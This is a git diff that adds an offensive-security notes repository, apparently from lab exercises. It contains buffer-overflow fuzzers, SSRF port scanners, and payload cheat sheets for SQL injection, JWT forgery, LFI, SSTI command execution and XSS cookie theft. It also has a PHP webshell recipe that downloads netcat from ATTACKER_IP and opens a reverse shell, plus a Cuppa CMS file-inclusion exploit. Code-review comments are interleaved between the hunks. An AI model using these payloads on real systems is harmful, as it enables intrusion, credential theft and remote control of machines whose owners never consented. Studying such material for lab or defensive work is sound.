@@ -0,0 +1,24 @@ +#!/usr/bin/env python +import sys, time, socket + +ip = "192.168.56.102" +port = 31337 +timeout = 5 +prefix = "" +counter = 100 + +string = prefix + "A" * counter +while True: + try: + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: + s.connect((ip, port)) + print ('[+] Sending buffer') + #s.recv(1024) + print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + s.send(bytes(string + '\r\n', "latin1")) + s.recv(1024) + except: + print ("[!] The program can't be reached") + sys.exit(0) + string += counter * 'A' + time.sleep(1) diff --git a/exploit/buffer_overflow/fuzzer2.py b/exploit/buffer_overflow/fuzzer2.py new file mode 100644 index 0000000..c46e581 --- /dev/null +++ b/exploit/buffer_overflow/fuzzer2.py @@ -0,0 +1,24 @@ +#!/usr/bin/env python2 +import sys,socket +import time + +address = '192.168.56.102' +port = 9999 +buffer = ['A'] +counter = 100 +while len(buffer) < 10: + buffer.append('A'*counter) + counter=counter+100 +try: + for string in buffer: + print '[+] Sending %s bytes...' % len(string) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + connect=s.connect((address,port)) + s.send(string + '\r\n') + s.recv(1024) + print '[+] Done' +except: + print '[!] Unable to connect to the application. You may have crashed it.' + sys.exit(0) +finally: + s.close() diff --git a/exploit/buffer_overflow/fuzzer_BO.py b/exploit/buffer_overflow/fuzzer_BO.py new file mode 100755 index 0000000..b098066 --- /dev/null +++ b/exploit/buffer_overflow/fuzzer_BO.py 
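Review bot: `timeout = 5` in the fuzzer.py hunk is defined but never applied, so `s.connect` and `s.recv` block indefinitely once the target stops responding and the crash is never reported; add `s.settimeout(timeout)` right after the socket is created, before `s.connect`. The shebang `#!/usr/bin/env python` is inconsistent with the body, which relies on `with socket.socket(...)` and `bytes(..., "latin1")` and therefore needs Python 3 — fuzzer_BO.py in this same commit already uses `python3`. `s.send` can complete a partial write; `s.sendall` guarantees the whole string goes out.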
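Review bot: In the fuzzer2.py hunk only the last socket is closed: a new `s` is created on every iteration of the `for` loop, but `s.close()` runs once in `finally`, so the earlier connections leak until the interpreter exits; close each socket at the end of the loop body. If `socket.socket()` itself raised on the first iteration, `finally` would fail with a `NameError` on `s` because it was never assigned. The `connect=s.connect((address,port))` assignment is unused; `connect` returns `None`, so plain `s.connect((address, port))` is enough.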
@@ -0,0 +1,31 @@ +#!/usr/bin/env python3 + +import socket, time, sys + +ip = "10.10.161.147" +port = 9999 +timeout = 5 +prefix = "" + +string = prefix + "A" * 100 + +while True: + try: + with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: + s.settimeout(timeout) + s.connect((ip, port)) + s.recv(1024) + s.recv(1024) + s.send("User" '\r\n') + #print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + s.send(bytes(string, "latin-1")) + s.recv(1024) + s.send(string + '\r\n') + #print("Fuzzing with {} bytes".format(len(string) - len(prefix))) + print(f"fuzzing with {len(string)} bytes") + except: + #print("Fuzzing crashed at {} bytes".format(len(string) - len(prefix))) + sys.exit(0) + string += 100 * "A" + time.sleep(1) + diff --git a/exploit/buffer_overflow/peda b/exploit/buffer_overflow/peda new file mode 160000 index 0000000..84d38bd --- /dev/null +++ b/exploit/buffer_overflow/peda @@ -0,0 +1 @@ +Subproject commit 84d38bda505941ba823db7f6c1bcca1e485a2d43 diff --git a/exploit/buffer_overflow/pwn_fuzz.py b/exploit/buffer_overflow/pwn_fuzz.py new file mode 100644 index 0000000..55c0c18 --- /dev/null +++ b/exploit/buffer_overflow/pwn_fuzz.py @@ -0,0 +1,8 @@ +import pwn + +r = pwn.remote("10.10.156.228", 9999) +r.recvuntil(":") +r.send("User\r\n") +r.recvuntil(":") +r.send(b'A' * 2200) +r.recvuntil("message:") diff --git a/exploit/python/pwntools.md b/exploit/python/pwntools.md new file mode 100644 index 0000000..9384c4f --- /dev/null +++ b/exploit/python/pwntools.md @@ -0,0 +1,3 @@ +# Pwntools + +* [Docs](https://docs.pwntools.com/en/stable/) diff --git a/exploit/python/scapy.md b/exploit/python/scapy.md new file mode 100644 index 0000000..dcd3101 --- /dev/null +++ b/exploit/python/scapy.md @@ -0,0 +1,4 @@ +# Scapy + +* [Doc](https://scapy.readthedocs.io/en/latest/introduction.html) + diff --git a/exploit/samba/smbmap b/exploit/samba/smbmap new file mode 160000 index 0000000..5c98c5f --- /dev/null +++ b/exploit/samba/smbmap 
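Review bot: `s.send("User" '\r\n')` in the fuzzer_BO.py hunk passes a `str` to a Python 3 socket, which raises `TypeError` on the very first iteration; the bare `except:` below then calls `sys.exit(0)` with its diagnostic commented out, so the script exits silently without ever fuzzing. The later `s.send(string + '\r\n')` has the same problem, while the `bytes(string, "latin-1")` call two lines earlier shows the intended form. Encode both, `s.send(b"User\r\n")` and `s.send(bytes(string + '\r\n', "latin-1"))`, and restore the print in the except branch so the byte count at which the target stopped responding is recorded before exiting.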
@@ -0,0 +1 @@ +Subproject commit 5c98c5f40a0aefaf374904ab53d6c03ba5b7a003 diff --git a/exploit/samba/smbmap.md b/exploit/samba/smbmap.md new file mode 100644 index 0000000..505eaec --- /dev/null +++ b/exploit/samba/smbmap.md @@ -0,0 +1,12 @@ +# smbmap + +* [Repo](https://github.com/ShawnDEvans/smbmap.git) +* `python3 -m pip install -r requirements.txt` + +# Usage +* `-x` execute command on server +* `-s` enumerate share + +```sh +smbmap -u "admin" -p "password" -H "10.10.10.10" -x 'ipconfig' +``` diff --git a/exploit/sqli/sqli.md b/exploit/sqli/sqli.md new file mode 100644 index 0000000..00efb8a --- /dev/null +++ b/exploit/sqli/sqli.md 
@@ -0,0 +1,86 @@ +# SQL Injection + +# Finding an Opportunity +* GET parameter +```sh +http://example.com/index.php?id=' or 1=1 -- - +``` +* Provoke error to gain information +```sh +http://example.com/index.php?id=' +``` + +# Usage + +* Example, terminate string via `'` and resolve via tautology, comment the rest of the string via `--` +```sql +SELECT * FROM users WHERE username = admin AND password := ' and 1=1 -- - +SELECT * FROM users WHERE username = admin AND password := ' or 1=1 --+ +``` + +* Boolean True and False +```sql +SELECT * FROM users WHERE username = admin AND password :=1' or 1 < 2 --+ +SELECT * FROM users WHERE username = admin AND password :=1' or 1 > 2 --+ +``` + +* Blind injection // Guessing characters +```sh +http://example.com/?id=1' substr((select database()),1,1)) < 105 --+ +``` + +### Union based +* Check number of cols +```sql +' UNION SELECT NULL-- +' UNION SELECT NULL,NULL-- +' UNION SELECT NULL,NULL,NULL-- +# until the error occurs +``` +* Check which one is a string +```sql +' UNION SELECT 'a',NULL,NULL,NULL-- +' UNION SELECT NULL,'a',NULL,NULL-- +' UNION SELECT NULL,NULL,'a',NULL-- +' UNION SELECT NULL,NULL,NULL,'a'-- +``` +* Retrieve content, for cols and comment two times as an example. 
Or dump database +```sql +' UNION SELECT NULL,NULL,database(),NULL,NULL from users -- // +' UNION SELECT NULL,username,password,NULL FROM users -- // +``` + +* [OWASP SQLi Docs](https://www.owasp.org/index.php/SQL_Injection) + +## Tools +### SQLmap +* [sqlmap](https://github.com/sqlmapproject/sqlmap.git) +* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/) +* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet) +* Use `-r` with a saved HTTP request +```sh +sqlmap -r request.txt --dbms=mysql --dump +sqlmap -r request.txt --batch +``` + + +|Parameter|Details| +|-r|Uses the intercepted request save as a file| +|--dbms|DBMS of target| +|--dump|Dump the entire database| +|--dump-all|Dump everything| +|-p |TESTPARAMETER| +|--os-shell|Prompt for an interactive operating system shell| +|--os-pwn|Prompt for an OOB shell, Meterpreter or VNC| + +### Damn Small SQLi Scanner (DSSS) +* [Script](https://github.com/stamparm/DSSS.git) +```sh +python dsss.py -u "http://example.com/index.php?id=" +``` + +### Online sqlmap +* [Link](https://suip.biz/?act=sqlmap) + +## Payloads +* [List](https://github.com/payloadbox/sql-injection-payload-list#generic-sql-injection-payloads) diff --git a/exploit/sudo/CVE_2019_18634.md b/exploit/sudo/CVE_2019_18634.md new file mode 100644 index 0000000..a78fb18 --- /dev/null +++ b/exploit/sudo/CVE_2019_18634.md @@ -0,0 +1,4 @@ +# Sudo pwnge with pwfeedback() + +* Sudo version 1.7.1 to 1.8.30 +* [Saleem's github](https://github.com/saleemrashid/sudo-cve-2019-18634) diff --git a/exploit/web/beef b/exploit/web/beef new file mode 160000 index 0000000..15af383 --- /dev/null +++ b/exploit/web/beef @@ -0,0 +1 @@ +Subproject commit 15af383355e87428a54251664feca7004a21e291 diff --git a/exploit/web/csrf.md b/exploit/web/csrf.md new file mode 100644 index 0000000..435546d --- /dev/null +++ b/exploit/web/csrf.md @@ -0,0 +1 @@ +# CSRF 
diff --git a/exploit/web/forced_browsing/forced_browsing.md b/exploit/web/forced_browsing/forced_browsing.md new file mode 100644 index 0000000..346fa01 --- /dev/null +++ b/exploit/web/forced_browsing/forced_browsing.md @@ -0,0 +1,23 @@ +# Forced Browsing +Forced browsing is the art of using logic to find resources on the website that you would not normally be able to access. For example let's say we have a note taking site, that is structured like this. http://example.com/user1/note.txt. It stands to reason that if we did http://example.com/user2/note.txt we may be able to access user2's note. + +## Usage + +## Tools + +### wfuzz +* `pip install wfuzz` + +``` +wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hw 57 http://10.10.28.2/FUZZ/note.txt +``` + +|Parameter|Detail| +|---------|------| +|-c|Shows the output in color| +|-z|Specifies what will replace FUZZ in the request. For example -z file,big.txt will read through all the lines of big.txt and replace FUZZ with| +|--hc|Don't show certain http response codes| +|--hl|Don't show a certain amount of lines in the response| +|--hh|Don't show a certain amount of words| +|--hw|Don't show word response return val of this length| + diff --git a/exploit/web/idor/idor.md b/exploit/web/idor/idor.md new file mode 100644 index 0000000..52f29d3 --- /dev/null +++ b/exploit/web/idor/idor.md @@ -0,0 +1,3 @@ +# Insecure Direct Object Reference (IDOR) + +Changing URL parameters. diff --git a/exploit/web/jwt/jwt-cracker b/exploit/web/jwt/jwt-cracker new file mode 160000 index 0000000..8822dd2 --- /dev/null +++ b/exploit/web/jwt/jwt-cracker @@ -0,0 +1 @@ +Subproject commit 8822dd26550174eaa80f3cc7b0b023d0aad52c61 diff --git a/exploit/web/jwt/jwt.md b/exploit/web/jwt/jwt.md new file mode 100644 index 0000000..4768c79 --- /dev/null +++ b/exploit/web/jwt/jwt.md 
@@ -0,0 +1,88 @@ +# JSON Web Token + +## Build up +```sh +header.payload.signature +``` + +1. **Header**: This consists of the algorithm used and the type of the token. +```sh +{ "alg": "HS256", "typ": "JWT"} +``` + +2. **Payload**: This is part that contains the access given to the certain user etc. This can vary from website to website, some can just have a simple username and some ID and others could have a lot of other details. + + +3. **Signature**: This is the part that is used to make sure that the integrity of the data was maintained while transferring it from a user's computer to the server and back. This is encrypted with whatever algorithm or alg that was passed in the header's value. And this can only be decrypted with a predefined secret(which should be difficult to) + + +## NONE Algorithm Vulnerability +* Example with `alg: NONE`, so no third part is needed. +```sh +eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K.eyJleHAiOjE1ODY3MDUyOTUsImlhdCI6MTU4NjcwNDk5NSwibmJmIjoxNTg2NzA0OTk1LCJpZGVudGl0eSI6MH0K. +``` +* Encoded headers are as follows + * `{"type": "JWT", "alg": "none"}` + ``` + eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0 + ``` + * `{"typ":"JWT","alg":"NONE"}` with trailing `\n` + ``` + eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0K + ``` + +## Brute Force +```python +HMACSHA256( base64UrlEncode(header) + "." 
+ base64UrlEncode(payload), secret) +``` +* [jwt-cracker](https://github.com/lmammino/jwt-cracker.git) + +|Parameter|Details| +|---------|-------| +|Token | The HS256 JWT Token| +|Alphabet |Alphabet used to crack (default:"abcdefghijklmnopqrstuvwxyz")| +|max-length|Secret max length (default: 12)| + +```sh +[whackx@manbox jwt-cracker]$ node index.js eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE abcdefghijklmnopqrstuvwxyz 4 +Attempts: 100000 +Attempts: 200000 +Attempts: 300000 +SECRET FOUND: pass +Time taken (sec): 11.605 +Attempts: 346830 +``` +## HS256 Vulnerability +It is calculated by using server `K_pub`, which may be gained via content of the server cert + +### Build Up +* Changing the header to `{"typ": "JWT", "alg": "HS256"}`, spaces inbetween values. +```sh +$ echo -n '{"typ": "JWT", "alg": "HS256"}' | base64 +eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9 +``` + +* Encoding the payload, no spaces inbetween. Cut `==` at the end. 
+```sh +echo -n '{"iss":"http://localhost","iat":1585323784,"exp":1585323904,"data":{"hello":"world"}}' | base64 +eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ== +``` + +* Crafting the HMAC signature + * Convert `K_pub` file to hex + ```sh + cat id_rsa.pub | xxd -p | tr -d "\\n" + ``` + * Sign the message to get the signature as hex value + ```sh + echo -n "eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vbG9jYWxob3N0IiwiaWF0IjoxNTg1MzIzNzg0LCJleHAiOjE1ODUzMjM5MDQsImRhdGEiOnsiaGVsbG8iOiJ3b3JsZCJ9fQ" | openssl dgst -sha256 -mac HMAC -macopt hexkey + ``` + * Decode hex to binary data and reencode as base64 via python + ```python + python -c "exec(\"import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('')).replace('=','')\")" + ``` + +## Tools +* [JWTtool](https://github.com/ticarpi/jwt_tool.git) +* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/JSON%20Web%20Token) +* https://jwt.io diff --git a/exploit/web/jwt/jwt_tool b/exploit/web/jwt/jwt_tool new file mode 160000 index 0000000..c765a2e --- /dev/null +++ b/exploit/web/jwt/jwt_tool @@ -0,0 +1 @@ +Subproject commit c765a2e0d0c25b883dcb92a6966c69b9880098da diff --git a/exploit/web/jwt_header b/exploit/web/jwt_header new file mode 100644 index 0000000..2b81565 --- /dev/null +++ b/exploit/web/jwt_header @@ -0,0 +1 @@ +{"typ": "JWT", "alg": "HS256"} diff --git a/exploit/web/local_file_inclusion.md b/exploit/web/local_file_inclusion.md new file mode 100644 index 0000000..fa5c97f --- /dev/null +++ b/exploit/web/local_file_inclusion.md 
@@ -0,0 +1,19 @@
+# Local File Inclusion
+To test for LFI what we need is a parameter on any URL or any other input fields like request body etc. For example, if the website is tryhackme.com then a parameter in the URL can look like `https://tryhackme.com/?file=robots.txt`. Here file is the name of the parameter and `robots.txt` is the value that we are passing (include the file robots.txt).
+
+## Usage
+
+* Exploit URL parameter
+```
+http://example.com/home?page=about.html
+```
+ * changed to path traversal, with [interesting files](https://github.com/cyberheartmi9/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#basic-lfi-null-byte-double-encoding-and-other-tricks)
+ ```
+ http://example.com/home?page=../../../../etc/passwd
+ ```
+ or
+ ```
+ http://example.com/home?page=../../../../home//.ssh/id_rsa
+ ```
+
+
diff --git a/exploit/web/methodology.md b/exploit/web/methodology.md
new file mode 100644
index 0000000..fd3e0f2
--- /dev/null
+++ b/exploit/web/methodology.md
@@ -0,0 +1,17 @@
+We'll look at this as a step-by-step process. Let's say that we've been given a website to perform a security audit on.
+
+1. The first thing we would do is take a look at the website as a whole. Using browser extensions such as the aforementioned Wappalyzer (or by hand) we would look for indicators of what languages and frameworks the web application might have been built with. Be aware that Wappalyzer is not always 100% accurate. A good start to enumerating this manually would be by making a request to the website and intercepting the response with Burpsuite. Headers such as server or x-powered-by can be used to gain information about the server. We would also be looking for vectors of attack, like, for example, an upload page.
+2. Having found an upload page, we would then aim to inspect it further. Looking at the source code for client-side scripts to determine if there are any client-side filters to bypass would be a good thing to start with, as this is completely in our control.
+3. We would then attempt a completely innocent file upload. From here we would look to see how our file is accessed. In other words, can we access it directly in an uploads folder? Is it embedded in a page somewhere? What's the naming scheme of the website? This is where tools such as Gobuster might come in if the location is not immediately obvious. This step is extremely important as it not only improves our knowledge of the virtual landscape we're attacking, it also gives us a baseline "accepted" file which we can base further testing on.
+ * An important Gobuster switch here is the -x switch, which can be used to look for files with specific extensions. For example, if you added -x php,txt,html to your Gobuster command, the tool would append .php, .txt, and .html to each word in the selected wordlist, one at a time. This can be very useful if you've managed to upload a payload and the server is changing the name of uploaded files.
+4. 
Having ascertained how and where our uploaded files can be accessed, we would then attempt a malicious file upload, bypassing any client-side filters we found in step two. We would expect our upload to be stopped by a server side filter, but the error message that it gives us can be extremely useful in determining our next steps.
+
+
+Assuming that our malicious file upload has been stopped by the server, here are some ways to ascertain what kind of server-side filter may be in place:
+
+ * If you can successfully upload a file with a totally invalid file extension (e.g. testingimage.invalidfileextension) then the chances are that the server is using an extension blacklist to filter out executable files. If this upload fails then any extension filter will be operating on a whitelist.
+ * Try re-uploading your originally accepted innocent file, but this time change the magic number of the file to be something that you would expect to be filtered. If the upload fails then you know that the server is using a magic number based filter.
+ * As with the previous point, try to upload your innocent file, but intercept the request with Burpsuite and change the MIME type of the upload to something that you would expect to be filtered. If the upload fails then you know that the server is filtering based on MIME types.
+ * Enumerating file length filters is a case of uploading a small file, then uploading progressively bigger files until you hit the filter. At that point you'll know what the acceptable limit is. If you're very lucky then the error message of original upload may outright tell you what the size limit is. Be aware that a small file length limit may prevent you from uploading the reverse shell we've been using so far.
+
+
diff --git a/exploit/web/php_image_exif.md b/exploit/web/php_image_exif.md
new file mode 100644
index 0000000..3a31090
--- /dev/null
+++ b/exploit/web/php_image_exif.md
@@ -0,0 +1,35 @@ +# PHP Payload in Image ExifData + +* Test +```sh +exiftool -Comment="Test Payload\"; die(); ?>" test-USERNAME.jpeg.php +``` + +* Build Payload with AV evasion +```sh +" . shell_exec($cmd) . ""; + } + die(); +?> +``` + +* [php obfuscater](https://www.gaijin.at/en/tools/php-obfuscator) + +* Obfuscated code with escaped `$` +```sh + +``` +* Upload and execute commands with get parameter `?wreath=systeminfo` + +## Uploading Reverse through Webshell +* Parameter for Webshell +```sh +curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe +``` +* Trigger uploaded netcat +```sh +powershell.exe c:\\windows\\temp\\nc-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe +``` diff --git a/exploit/web/re_registration.md b/exploit/web/re_registration.md new file mode 100644 index 0000000..bb5db62 --- /dev/null +++ b/exploit/web/re_registration.md @@ -0,0 +1,9 @@ +# Re-registration + +Let's understand this with the help of an example, say there is an existing user with the name admin and now we want to get access to their account so what we can do is try to re-register that username but with slight modification. We are going to enter " admin"(notice the space in the starting). Now when you enter that in the username field and enter other required information like email id or password and submit that data. It will actually register a new user but that user will have the same right as normal admin. And that new user will also be able to see all the content present under the user admin. + +# Usage +* Re-register. The name is taken, that's the point, but alter the string +``` + try to register a user name darren, you'll see that user already exists so then try to register a user " darren" and you'll see that you are now logged in and will be able to see the content present only in Darren's account which in our case is the flag that you need to retrieve. +``` 
diff --git a/exploit/web/remote_file_inclusion.txt b/exploit/web/remote_file_inclusion.txt
new file mode 100644
index 0000000..a035a70
--- /dev/null
+++ b/exploit/web/remote_file_inclusion.txt
@@ -0,0 +1,87 @@ +# Exploit Title : Cuppa CMS File Inclusion +# Date : 4 June 2013 +# Exploit Author : CWH Underground +# Site : www.2600.in.th +# Vendor Homepage : http://www.cuppacms.com/ +# Software Link : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip +# Version : Beta +# Tested on : Window and Linux + + ,--^----------,--------,-----,-------^--, + | ||||||||| `--------' | O .. CWH Underground Hacking Team .. + `+---------------------------^----------| + `\_,-------, _________________________| + / XXXXXX /`| / + / XXXXXX / `\ / + / XXXXXX /\______( + / XXXXXX / + / XXXXXX / + (________( + `------' + +#################################### +VULNERABILITY: PHP CODE INJECTION +#################################### + +/alerts/alertConfigField.php (LINE: 22) + +----------------------------------------------------------------------------- +LINE 22: + +----------------------------------------------------------------------------- + + +##################################################### +DESCRIPTION +##################################################### + +An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise. + +http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI] + +##################################################### +EXPLOIT +##################################################### + +http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt? 
+http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd + +Moreover, We could access Configuration.php source code via PHPStream + +For Example: +----------------------------------------------------------------------------- +http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php +----------------------------------------------------------------------------- + +Base64 Encode Output: +----------------------------------------------------------------------------- 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 +----------------------------------------------------------------------------- + +Base64 Decode Output: +----------------------------------------------------------------------------- + +----------------------------------------------------------------------------- + +Able to read sensitive information via File Inclusion (PHP Stream) + +################################################################################################################ + Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 +################################################################################################################ \ No newline at end of file diff --git a/exploit/web/ssrf/check_ssrf.py b/exploit/web/ssrf/check_ssrf.py new file mode 100644 index 0000000..76700b5 --- /dev/null +++ b/exploit/web/ssrf/check_ssrf.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python + +import requests + +s = requests.Session() + +t = [] +j = 0 +for i in range(1, 65536): + r = s.get(f"http://10.10.214.67:8000/attack?url=http%3A%2F%2F0xa0a0a05%3A{i}") + print(r.text) + if "Target is not reachable!" in r.text: + print(f"{i} is reachable, sum is {j}") + t.append(f"Port {i}, {r.text}") + else: + print (f"{i} not reachable") +print(t) diff --git a/exploit/web/ssrf/curl.sh b/exploit/web/ssrf/curl.sh new file mode 100644 index 0000000..2f492aa 
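Review bot: In check_ssrf.py the branch taken when `"Target is not reachable!"` appears in the response prints `{i} is reachable` and appends the port to `t`, so the condition and the messages contradict each other and one of the two needs reversing before the collected list means anything. `j` is set to 0 and never changed, so `sum is {j}` always prints 0 and the counter can be dropped. The shebang is `#!/usr/bin/env python` while the body uses f-strings, which need Python 3.6+, so `#!/usr/bin/env python3` is the accurate interpreter line. The base URL is hard-coded inside the f-string; lifting it to a module-level constant such as `BASE = "http://10.10.214.67:8000/attack"` keeps the loop body readable and makes the target obvious at the top of the file.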
--- /dev/null
+++ b/exploit/web/ssrf/curl.sh
@@ -0,0 +1,8 @@
+#!/usr/bin/env bash
+for x in {1..65535};
+ do cmd=$(curl -so /dev/null http://10.10.214.67:8000/attack?url=http://2130706433:${x} \
+ -w '%{size_download}');
+ if [ $cmd != 1045 ]; then
+ echo "Open port: $x"
+ fi
+done
diff --git a/exploit/web/ssrf/ip2dh.py b/exploit/web/ssrf/ip2dh.py
new file mode 100644
index 0000000..6a82168
--- /dev/null
+++ b/exploit/web/ssrf/ip2dh.py
@@ -0,0 +1,31 @@
+"""
+u can run this in the following format:
+For decimal: python3 ip2dh.py D
+For Hexadecimal: python3 ip2dh.py H
+"""
+#!/usr/bin/python3
+
+import sys
+
+if len(sys.argv) < 3:
+ print('\nYou must give desired format and IPv4 address as input...')
+ print('e.g.: D 192.168.10.100')
+ print('Valid formats D=Decimal H=Hexadecimal\n')
+ sys.exit(1)
+
+Format = sys.argv[1]
+
+def long(ip):
+ IP = ip.split('.')
+ IP = list(map(int, IP))
+ LongIP = IP[0]*2**24 + IP[1]*2**16 + IP[2]*2**8 + IP[3]
+ return LongIP
+
+ip = long(sys.argv[2])
+
+if Format == 'D':
+ print('\nIP as Decimal format: %s' % (ip))
+
+if Format == 'H':
+ print('\nIP as Hexadecimal format: %s' % (hex(ip)))
+
diff --git a/exploit/web/ssrf/ssrf.md b/exploit/web/ssrf/ssrf.md
new file mode 100644
index 0000000..3e96e80
--- /dev/null
+++ b/exploit/web/ssrf/ssrf.md
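Review bot: `if [ $cmd != 1045 ]; then` in curl.sh leaves `$cmd` unquoted, so if `-w` ever yields an empty string the test degenerates to `[ != 1045 ]` and bash aborts that iteration with a "unary operator expected" error instead of reporting anything; quote it and use the bash test: `if [[ "$cmd" != 1045 ]]; then`. The curl URL is also unquoted and contains `?`, which the shell treats as a glob character, so it should be wrapped: `"http://10.10.214.67:8000/attack?url=http://2130706433:${x}"`. `1045` is an undocumented magic number; a one-line comment above the loop stating which response it is the byte size of (`# 1045 = size of the "not reachable" error page`) would save the next reader a capture. The script has no `set -euo pipefail`, so a curl failure is silently treated as a differing size.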
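Review bot: The `#!/usr/bin/python3` line in ip2dh.py sits on line 6, after the module docstring, so it is an ordinary comment there and the file cannot be executed directly; it belongs on line 1 above the docstring. The docstring's usage examples (`python3 ip2dh.py D`) omit the address argument that the `len(sys.argv) < 3` check requires, so they should read `python3 ip2dh.py D 192.168.10.100`, matching the help text the script prints on failure. `long()` assumes exactly four numeric octets: `int()` raises on non-numeric input and a three-octet string raises `IndexError`, and any `Format` other than `D`/`H` exits silently with no output. The standard library's `ipaddress.IPv4Address` performs the same conversion with validation (`int(ipaddress.IPv4Address(sys.argv[2]))`), which would replace `long()` and give a clear error on bad input.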
@@ -0,0 +1,26 @@
+# Server Side Request Forgery (SSRF)
+is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can make use of this vulnerability to communicate with any internal services on the server's network which are generally protected by firewalls.
+
+## Usage
+
+### Sanity Test Service
+Test if input is sanitized by exploiting function. Here it is IP:PORT finding service. Test for localhost ports.
+```
+http://127.0.0.1:3306
+http://localhost:5432
+http://0.0.0.0:53
+```
+* IPv6
+```
+http://[::]:3306
+http://:::3006
+```
+* [Changing input format into hex or encoded](https://gist.github.com/mzfr/fd9959bea8e7965d851871d09374bb72)
+
+### Reading files
+```
+file:///etc/passwd
+```
+
+### Tools
+* [Payload All The Things](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery#file)
diff --git a/exploit/web/ssti/ssti.md b/exploit/web/ssti/ssti.md
new file mode 100644
index 0000000..926a000
--- /dev/null
+++ b/exploit/web/ssti/ssti.md
@@ -0,0 +1,59 @@ +# Server Side Template Injection (SSTI) +Pass in parameters to control the template. + +## Usage +* Sanity test +```python +{{2+2}} +``` + +* Flask template LFI +```python +{{ ''.__class__.__mro__[2].__subclasses__()[40]()().read()}} +``` + +* Executing commands +```sh +{{ ''.__class__.__mro__[1].__subclasses__()[401]("whoami", shell=True, stdout=-1).communicate() }} +``` + +* RCE on server +```python +{{config.__class__.__init__.__globals__['os'].popen().read()}} +``` + +## Identification of Template Engine +Identify via payload checking +* Smarty: `a{*comment*}b` +* Mako: `${"z".join("ab")}` +* Twig or Jinja2 +```sh +{{7*7}} +{{7*'7'}} +``` + +## Tools +### TPlmap +```sh +git clone https://github.com/epinna/tplmap.git +pip2 install -r requirements +``` + +|HTTP Method|Parameter| +|-----------|---------| +|GET|`tplmap -u /?`| +|POST|`tplmap -u -d ''`| + +* Using remote command +``` +tplmap -u http://:/ -d '' --os-cmd "cat /etc/passwd" +``` + +### Countermeasure +* Remove everything in user input but alnum. Passing data, not data to f-string. +```python +input = re.sub("[^A-Za-z0-9]", "", input) +template = "User input is {{ input }}" +return render_template_string(template, input=input) +``` + diff --git a/exploit/web/ssti/tplmap b/exploit/web/ssti/tplmap new file mode 160000 index 0000000..1d63156 --- /dev/null +++ b/exploit/web/ssti/tplmap @@ -0,0 +1 @@ +Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98 diff --git a/exploit/web/url_forgery.md b/exploit/web/url_forgery.md new file mode 100644 index 0000000..7d0ce82 --- /dev/null +++ b/exploit/web/url_forgery.md @@ -0,0 +1,3 @@ +# URL Forgery + +* Just change parts of the URL diff --git a/exploit/web/xss.md b/exploit/web/xss.md new file mode 100644 index 0000000..e7fea4c --- /dev/null +++ b/exploit/web/xss.md 
@@ -0,0 +1,106 @@ +# Cross-Site Scripting +A web application is vulnerable to XSS if it uses unsanitized user input. XSS is possible in Javascript, VBScript, Flash and CSS. + +## Stored XSS +This is where a malicious string originates from the websites database. + +### Examples +* Sanity test by changing DOM content +``` + +``` + +* Cookie stealing + +``` + +``` + * Navigte to `/logs` and take sid + +## Reflected XSS +In a reflected cross-site scripting attack, the malicious payload is part of the victims request to the website. The website includes this payload in response back to the user. To summarise, an attacker needs to trick a victim into clicking a URL to execute their malicious payload. + +### Usage +As script inside parameter +```sh +http://example.com/search?keyword= +``` +* Show server IP +``` +http://example.com/reflected?keyword= +``` + +## DOM based XSS +With DOM-Based xss, an attackers payload will only be executed when the vulnerable Javascript code is either loaded or interacted with. It goes through a Javascript function like so: +```javascript +var keyword = document.querySelector('#search') +keyword.innerHTML = +``` + +### Usage +* Find the sub-object inside the document +```javascript +test" onmouseover="alert('YO!')" +``` +* Show cookie +``` +test" onmouseover="alert(document.cookie)" +``` +## Bypass Filters +* `script>alert("1")</script> +``` +* `alert()` sanitizing +```javascript +0\"autofocus/onfocus=alert(1)-->"-confirm(3)-" +``` +or +```javascript +0\"autofocus/onfocus=alert(1)-->